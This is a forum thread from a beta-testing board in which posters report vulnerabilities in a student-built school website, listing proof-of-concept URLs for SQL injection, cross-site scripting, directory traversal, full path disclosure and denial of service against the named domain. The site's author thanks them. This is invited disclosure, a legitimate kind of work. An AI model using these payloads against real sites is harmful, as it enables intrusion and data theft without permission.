Jump to content

[SOLVED] School site

allyant

By allyant
in Beta Test Your Stuff!

 Share

Recommended Posts

kathas Newbie

kathas

Posted
Posted

SQL injection:

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1234%20or%201=1

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=

 

SQL injection:

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id='

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 or 1=1

 

Full path disclosure + i can include any file on your server (Big hole):

http://www.deanschs.co.uk/controller.php?do=./../&mode=index&id=1

 

Delete this file:

http://www.deanschs.co.uk/test.php

 

Good way to DoS the site:

http://www.deanschs.co.uk/controller.php?do=account&mode=login

Link to comment
https://forums.phpfreaks.com/topic/69587-solved-school-site/#findComment-349722
Share on other sites
agentsteal Newbie

agentsteal

Posted
Posted

Cross Site Scripting:

http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.deanschs.co.uk/test.php?<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if the Expect header contains code.

 

Cross Site Scripting:

There is Cross Site Scripting when you register if the fields contain code.

 

Directory Transversal:

http://www.deanschs.co.uk/controller.php?mode=../test.php

 

DOS:

http://www.deanschs.co.uk/module/account/login.php/

 

Drop Down Menu:

If you edit the drop down menus in the header you can submit arbitrary values.

 

Full Path Disclosure:

http://www.deanschs.co.uk/controller.php

 

Full Path Disclosure:

http://www.deanschs.co.uk/controller.php?do[]

 

Full Path Disclosure:

http://www.deanschs.co.uk/controller.php?do=get&mode=embedded&id[]

 

Full Path Disclosure:

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1&gid[]

 

Full Path Disclosure:

http://www.deanschs.co.uk/controller.php?mode=../test.php

 

Full Path Disclosure:

http://www.deanschs.co.uk/controller.php?mode[]

 

Full Path Disclosure:

Parse error: parse error, unexpected '}' in /homepages/4/d166579989/htdocs/controller.php on line 12

 

SQL Error:

http://www.deanschs.co.uk/controller.php?do=get&mode=embedded

 

SQL Error:

http://www.deanschs.co.uk/module/get/showindex.php

 

SQL Error:

http://www.deanschs.co.uk/module/get/showindexsub.php

 

SQL Error:

http://www.deanschs.co.uk/module/get/showpage.php

 

SQL Injection:

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=1

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=1 AND 1=2

 

SQL Injection:

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=1

http://www.deanschs.co.uk/controller.php?do=get&mode=showindex&id=3&gid=1 AND 1=2

Link to comment
https://forums.phpfreaks.com/topic/69587-solved-school-site/#findComment-349764
Share on other sites
  • 2 weeks later...
sjames06 Newbie

sjames06

Posted
Posted

Thanks all for your time in showing these errors to me. I do find it amusing that the author of this thread is trying to claim the site as his work, the footer does say that it was created as part of a AH Computing Project by Scott James, who is infact me.

 

Once again, thank you for showing me these holes.

 

Scott

Link to comment
https://forums.phpfreaks.com/topic/69587-solved-school-site/#findComment-355728
Share on other sites
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.